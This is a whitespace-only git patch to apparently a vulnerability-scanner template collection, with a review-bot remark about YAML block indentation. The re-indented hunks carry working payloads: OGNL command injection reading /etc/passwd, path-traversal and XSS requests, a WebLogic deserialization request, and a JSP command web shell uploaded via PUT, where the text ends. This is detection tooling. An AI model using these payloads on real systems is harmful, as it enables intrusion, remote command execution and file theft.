From 77103bc629fd0e64888d27a85ded6676821d4458 Mon Sep 17 00:00:00 2001
From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com>
Date: Thu, 19 Aug 2021 17:44:46 +0300
Subject: [PATCH] Satisfying the linter (all errors and warnings) * whitespace
modifications only
---
cnvd/CNVD-2021-30167.yaml | 4 +-
cves/2007/CVE-2007-4556.yaml | 2 +-
cves/2012/CVE-2012-1835.yaml | 8 +-
cves/2013/CVE-2013-1965.yaml | 2 +-
cves/2013/CVE-2013-3827.yaml | 4 +-
cves/2013/CVE-2013-7240.yaml | 4 +-
cves/2014/CVE-2014-4210.yaml | 4 +-
cves/2015/CVE-2015-2080.yaml | 2 +-
cves/2015/CVE-2015-3337.yaml | 36 +++---
cves/2015/CVE-2015-5688.yaml | 40 +++---
cves/2015/CVE-2015-7823.yaml | 4 +-
cves/2016/CVE-2016-2004.yaml | 4 +-
cves/2017/CVE-2017-1000028.yaml | 36 +++---
cves/2017/CVE-2017-1000486.yaml | 8 +-
cves/2017/CVE-2017-10271.yaml | 90 +++++++-------
cves/2017/CVE-2017-12149.yaml | 6 +-
cves/2017/CVE-2017-12542.yaml | 4 +-
cves/2017/CVE-2017-12615.yaml | 38 +++---
cves/2017/CVE-2017-12629.yaml | 8 +-
cves/2017/CVE-2017-12637.yaml | 6 +-
cves/2017/CVE-2017-14535.yaml | 4 +-
cves/2017/CVE-2017-14537.yaml | 6 +-
cves/2017/CVE-2017-15944.yaml | 4 +-
cves/2017/CVE-2017-3506.yaml | 4 +-
cves/2017/CVE-2017-3528.yaml | 4 +-
cves/2017/CVE-2017-5487.yaml | 4 +-
cves/2017/CVE-2017-5638.yaml | 18 +--
cves/2017/CVE-2017-9805.yaml | 114 +++++++++---------
cves/2018/CVE-2018-16059.yaml | 4 +-
cves/2018/CVE-2018-16283.yaml | 4 +-
cves/2018/CVE-2018-17431.yaml | 4 +-
cves/2018/CVE-2018-8715.yaml | 2 +-
cves/2019/CVE-2019-0193.yaml | 6 +-
cves/2019/CVE-2019-0221.yaml | 8 +-
cves/2019/CVE-2019-1010287.yaml | 2 +-
cves/2019/CVE-2019-12616.yaml | 8 +-
cves/2019/CVE-2019-13101.yaml | 6 +-
cves/2019/CVE-2019-15043.yaml | 2 +-
cves/2019/CVE-2019-15107.yaml | 2 +-
cves/2019/CVE-2019-16097.yaml | 6 +-
cves/2019/CVE-2019-17506.yaml | 2 +-
cves/2019/CVE-2019-2616.yaml | 4 +-
cves/2019/CVE-2019-2767.yaml | 4 +-
cves/2019/CVE-2019-3396.yaml | 18 +--
cves/2019/CVE-2019-7238.yaml | 4 +-
cves/2019/CVE-2019-7256.yaml | 2 +-
cves/2019/CVE-2019-9733.yaml | 30 ++---
cves/2020/CVE-2019-9618.yaml | 4 +-
cves/2020/CVE-2020-11034.yaml | 6 +-
cves/2020/CVE-2020-11978.yaml | 6 +-
cves/2020/CVE-2020-13167.yaml | 16 +--
cves/2020/CVE-2020-13700.yaml | 6 +-
cves/2020/CVE-2020-13937.yaml | 12 +-
cves/2020/CVE-2020-14883.yaml | 2 +-
cves/2020/CVE-2020-15148.yaml | 4 +-
cves/2020/CVE-2020-15227.yaml | 8 +-
cves/2020/CVE-2020-21224.yaml | 2 +-
cves/2020/CVE-2020-27866.yaml | 6 +-
cves/2020/CVE-2020-27986.yaml | 6 +-
cves/2020/CVE-2020-36112.yaml | 4 +-
cves/2020/CVE-2020-36289.yaml | 4 +-
cves/2020/CVE-2020-5307.yaml | 2 +-
cves/2020/CVE-2020-7209.yaml | 4 +-
cves/2020/CVE-2020-7961.yaml | 4 +-
cves/2020/CVE-2020-9490.yaml | 8 +-
cves/2021/CVE-2021-20090.yaml | 6 +-
cves/2021/CVE-2021-20091.yaml | 6 +-
cves/2021/CVE-2021-20092.yaml | 6 +-
cves/2021/CVE-2021-21307.yaml | 6 +-
cves/2021/CVE-2021-22214.yaml | 6 +-
cves/2021/CVE-2021-24176.yaml | 4 +-
cves/2021/CVE-2021-24237.yaml | 4 +-
cves/2021/CVE-2021-24285.yaml | 6 +-
cves/2021/CVE-2021-24316.yaml | 4 +-
cves/2021/CVE-2021-24495.yaml | 4 +-
cves/2021/CVE-2021-25646.yaml | 4 +-
cves/2021/CVE-2021-26295.yaml | 6 +-
cves/2021/CVE-2021-26812.yaml | 4 +-
cves/2021/CVE-2021-26855.yaml | 10 +-
cves/2021/CVE-2021-27651.yaml | 4 +-
cves/2021/CVE-2021-27850.yaml | 2 +-
cves/2021/CVE-2021-27905.yaml | 8 +-
cves/2021/CVE-2021-28073.yaml | 4 +-
cves/2021/CVE-2021-28149.yaml | 2 +-
cves/2021/CVE-2021-29203.yaml | 4 +-
cves/2021/CVE-2021-29484.yaml | 4 +-
cves/2021/CVE-2021-3129.yaml | 4 +-
cves/2021/CVE-2021-32820.yaml | 4 +-
cves/2021/CVE-2021-3377.yaml | 4 +-
cves/2021/CVE-2021-34473.yaml | 6 +-
cves/2021/CVE-2021-35336.yaml | 4 +-
cves/2021/CVE-2021-35464.yaml | 2 +-
.../alibaba-canal-default-password.yaml | 2 +-
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
.../grafana/grafana-default-credential.yaml | 6 +-
dns/azure-takeover-detection.yaml | 6 +-
dns/detect-dangling-cname.yaml | 8 +-
exposures/apis/wadl-api.yaml | 4 +-
exposures/configs/exposed-gitignore.yaml | 4 +-
.../configs/exposed-sharepoint-list.yaml | 4 +-
exposures/configs/qdpm-info-leak.yaml | 2 +-
fuzzing/iis-shortname.yaml | 4 +-
headless/postmessage-tracker.yaml | 44 +++----
miscellaneous/tabnabbing-check.yaml | 6 +-
miscellaneous/unpatched-coldfusion.yaml | 4 +-
misconfiguration/akamai-arl-xss.yaml | 10 +-
misconfiguration/exposed-service-now.yaml | 4 +-
.../gitlab/gitlab-public-repos.yaml | 4 +-
.../gitlab/gitlab-public-snippets.yaml | 4 +-
.../gitlab/gitlab-user-enumeration.yaml | 6 +-
.../sap/sap-netweaver-info-leak.yaml | 4 +-
.../zabbix-dashboards-access.yaml | 4 +-
network/deprecated-sshv1-detection.yaml | 4 +-
network/openssh5.3-detect.yaml | 6 +-
takeovers/ceros-takeover.yaml | 4 +-
technologies/detect-sentry.yaml | 4 +-
.../microsoft-exchange-server-detect.yaml | 2 +-
technologies/waf-detect.yaml | 8 +-
.../apache/apache-flink-unauth-rce.yaml | 6 +-
.../apache/apache-solr-file-read.yaml | 6 +-
vulnerabilities/generic/cache-poisoning.yaml | 4 +-
.../lsoft/listserv_maestro_rce.yaml | 4 +-
vulnerabilities/oracle/oracle-ebs-xss.yaml | 6 +-
.../other/buffalo-config-injection.yaml | 6 +-
vulnerabilities/other/concrete-xss.yaml | 6 +-
.../other/dlink-850L-info-leak.yaml | 2 +-
.../other/maian-cart-preauth-rce.yaml | 6 +-
.../ms-exchange-server-reflected-xss.yaml | 4 +-
.../nginx-merge-slashes-path-traversal.yaml | 4 +-
vulnerabilities/other/opensns-rce.yaml | 4 +-
vulnerabilities/other/rconfig-rce.yaml | 4 +-
.../other/sonicwall-sslvpn-shellshock.yaml | 4 +-
.../other/wooyun-path-traversal.yaml | 6 +-
vulnerabilities/other/yapi-rce.yaml | 8 +-
.../wordpress/wordpress-woocommerce-sqli.yaml | 4 +-
.../wordpress-wpcourses-info-disclosure.yaml | 4 +-
.../wp-123contactform-plugin-listing.yaml | 4 +-
.../wp-memphis-documents-library-lfi.yaml | 4 +-
.../wordpress/wp-slideshow-xss.yaml | 6 +-
.../wp-woocommerce-pdf-invoice-listing.yaml | 6 +-
140 files changed, 543 insertions(+), 543 deletions(-)
diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml
index 7b7bc68cd0..c6a28b6fb0 100644
--- a/cnvd/CNVD-2021-30167.yaml
+++ b/cnvd/CNVD-2021-30167.yaml
@@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- - https://www.cnvd.org.cn/webinfo/show/6491
+ - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
+ - https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml
index 61b24bab2c..1a7b1450ed 100644
--- a/cves/2007/CVE-2007-4556.yaml
+++ b/cves/2007/CVE-2007-4556.yaml
@@ -15,7 +15,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+ username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml
index 9bc5c08991..a176328129 100644
--- a/cves/2012/CVE-2012-1835.yaml
+++ b/cves/2012/CVE-2012-1835.yaml
@@ -12,10 +12,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
-# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml
index 5539dfc559..e2e5f0a70c 100644
--- a/cves/2013/CVE-2013-1965.yaml
+++ b/cves/2013/CVE-2013-1965.yaml
@@ -15,7 +15,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
- name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+ name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml
index 033bea7806..2e0d3cb4a9 100644
--- a/cves/2013/CVE-2013-3827.yaml
+++ b/cves/2013/CVE-2013-3827.yaml
@@ -7,8 +7,8 @@ info:
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- - https://www.exploit-db.com/exploits/38802
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
+ - https://www.exploit-db.com/exploits/38802
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml
index a91e2000b3..35cf6180ea 100644
--- a/cves/2013/CVE-2013-7240.yaml
+++ b/cves/2013/CVE-2013-7240.yaml
@@ -6,8 +6,8 @@ info:
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- - https://www.exploit-db.com/exploits/38936
- - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
+ - https://www.exploit-db.com/exploits/38936
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml
index 9a70384c82..cc9b0f8793 100644
--- a/cves/2014/CVE-2014-4210.yaml
+++ b/cves/2014/CVE-2014-4210.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
+ - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml
index 52a97a3a65..f70ef7d40a 100644
--- a/cves/2015/CVE-2015-2080.yaml
+++ b/cves/2015/CVE-2015-2080.yaml
@@ -9,7 +9,7 @@ info:
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: |
- The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
+ The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests:
diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml
index 8b3acdf235..57306fca9b 100644
--- a/cves/2015/CVE-2015-3337.yaml
+++ b/cves/2015/CVE-2015-3337.yaml
@@ -1,25 +1,25 @@
id: CVE-2015-3337
info:
- name: Elasticsearch Head plugin LFI
- author: pdteam
- severity: high
- description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
- reference: https://www.exploit-db.com/exploits/37054/
- tags: cve,cve2015,elastic,lfi
+ name: Elasticsearch Head plugin LFI
+ author: pdteam
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ reference: https://www.exploit-db.com/exploits/37054/
+ tags: cve,cve2015,elastic,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+ - method: GET
+ path:
+ - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
- - type: status
- status:
- - 200
+ - type: status
+ status:
+ - 200
diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml
index 863d5b557d..aef5505ea8 100644
--- a/cves/2015/CVE-2015-5688.yaml
+++ b/cves/2015/CVE-2015-5688.yaml
@@ -1,27 +1,27 @@
id: CVE-2015-5688
info:
- name: Geddy before v13.0.8 LFI
- author: pikpikcu
- severity: high
- description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
- reference:
- - https://nodesecurity.io/advisories/geddy-directory-traversal
- - https://github.com/geddy/geddy/issues/697
- tags: cve,cve2015,geddy,lfi
+ name: Geddy before v13.0.8 LFI
+ author: pikpikcu
+ severity: high
+ description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
+ reference:
+ - https://nodesecurity.io/advisories/geddy-directory-traversal
+ - https://github.com/geddy/geddy/issues/697
+ tags: cve,cve2015,geddy,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+ - method: GET
+ path:
+ - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
- - type: status
- status:
- - 200
+ - type: status
+ status:
+ - 200
diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml
index 4fe2a7a788..6cb8fcbda7 100644
--- a/cves/2015/CVE-2015-7823.yaml
+++ b/cves/2015/CVE-2015-7823.yaml
@@ -5,8 +5,8 @@ info:
author: 0x_Akoko
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
reference:
- - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
+ - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
severity: low
tags: cve,cve2015,kentico,redirect
diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml
index 49679ca46d..639320dfc8 100644
--- a/cves/2016/CVE-2016-2004.yaml
+++ b/cves/2016/CVE-2016-2004.yaml
@@ -7,8 +7,8 @@ info:
tags: cve,cve2016,network,iot,hp,rce
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference:
- - https://www.exploit-db.com/exploits/39858
- - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+ - https://www.exploit-db.com/exploits/39858
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
network:
- inputs:
diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml
index 272270c8a2..7dc6d15282 100644
--- a/cves/2017/CVE-2017-1000028.yaml
+++ b/cves/2017/CVE-2017-1000028.yaml
@@ -1,24 +1,24 @@
id: CVE-2017-1000028
info:
- name: GlassFish LFI
- author: pikpikcu
- severity: high
- description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
- reference: https://www.exploit-db.com/exploits/45196
- tags: cve,cve2017,oracle,glassfish,lfi
+ name: GlassFish LFI
+ author: pikpikcu
+ severity: high
+ description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
+ reference: https://www.exploit-db.com/exploits/45196
+ tags: cve,cve2017,oracle,glassfish,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "/sbin/nologin"
- part: body
+ - method: GET
+ path:
+ - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "/sbin/nologin"
+ part: body
- - type: status
- status:
- - 200
\ No newline at end of file
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml
index 3f8ce3acd8..41d8c711b1 100644
--- a/cves/2017/CVE-2017-1000486.yaml
+++ b/cves/2017/CVE-2017-1000486.yaml
@@ -6,10 +6,10 @@ info:
severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
reference:
- - https://github.com/mogwailabs/CVE-2017-1000486
- - https://github.com/pimps/CVE-2017-1000486
- - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
+ - https://github.com/mogwailabs/CVE-2017-1000486
+ - https://github.com/pimps/CVE-2017-1000486
+ - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce
requests:
diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml
index be45ec2616..2782404f8a 100644
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -13,52 +13,52 @@ info:
requests:
- raw:
- |
- POST /wls-wsat/CoordinatorPortType HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- Connection: close
- Content-Type: text/xml
- Content-Length: 5178
+ POST /wls-wsat/CoordinatorPortType HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+ Connection: close
+ Content-Type: text/xml
+ Content-Length: 5178
-
-
-
-
-
-
- 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
-
-
-
- com.supeream.exploits.XmlExp
-
-
-
- cat /etc/passwd
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+ 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
+
+
+
+ com.supeream.exploits.XmlExp
+
+
+
+ cat /etc/passwd
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
matchers:
- type: regex
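Review bot: The re-indented lines at the top of this hunk are the content of a `raw: - |` literal block scalar, so their leading whitespace is part of the HTTP request that gets sent, not YAML layout, and the diff only shows that each line moved, not that the request/header lines and the XML body beneath them moved by the same amount. If the `POST` and `Host:` lines ended up at a different indent than the body, the stripped common indent changes and the surplus spaces go on the wire, which breaks the request silently (a missed detection rather than an error). Please confirm the values are unchanged by loading the old and new files with a YAML parser and comparing the parsed `raw` strings, and do the same for the `body: |` hunk in cves/2017/CVE-2017-12615.yaml and the `- |` hunk in cves/2017/CVE-2017-5638.yaml; the `description: |` re-indents are cosmetic either way. The `matchers` list this hunk ends on continues outside the hunk.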
diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml
index edaaad11a4..fd2fd2781a 100755
--- a/cves/2017/CVE-2017-12149.yaml
+++ b/cves/2017/CVE-2017-12149.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- - https://chowdera.com/2020/12/20201229190934023w.html
- - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
+ - https://chowdera.com/2020/12/20201229190934023w.html
+ - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization
requests:
diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml
index 24936c9c92..da7a45c350 100644
--- a/cves/2017/CVE-2017-12542.yaml
+++ b/cves/2017/CVE-2017-12542.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- - https://www.exploit-db.com/exploits/44005
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ - https://www.exploit-db.com/exploits/44005
tags: cve,cve2017,ilo4,hpe
requests:
diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml
index 047b8cede3..e78786d62d 100644
--- a/cves/2017/CVE-2017-12615.yaml
+++ b/cves/2017/CVE-2017-12615.yaml
@@ -7,10 +7,10 @@ info:
tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: |
- By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
- This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
- However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
- Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
+ By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
+ This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
+ However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
+ Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests:
- method: PUT
@@ -19,21 +19,21 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
- <%@ page import="java.util.*,java.io.*"%>
- <%
- if (request.getParameter("cmd") != null) {
- out.println("Command: " + request.getParameter("cmd") + "
");
- Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
- OutputStream os = p.getOutputStream();
- InputStream in = p.getInputStream();
- DataInputStream dis = new DataInputStream(in);
- String disr = dis.readLine();
- while ( disr != null ) {
- out.println(disr);
- disr = dis.readLine();
- }
- }
- %>
+ <%@ page import="java.util.*,java.io.*"%>
+ <%
+ if (request.getParameter("cmd") != null) {
+ out.println("Command: " + request.getParameter("cmd") + "
");
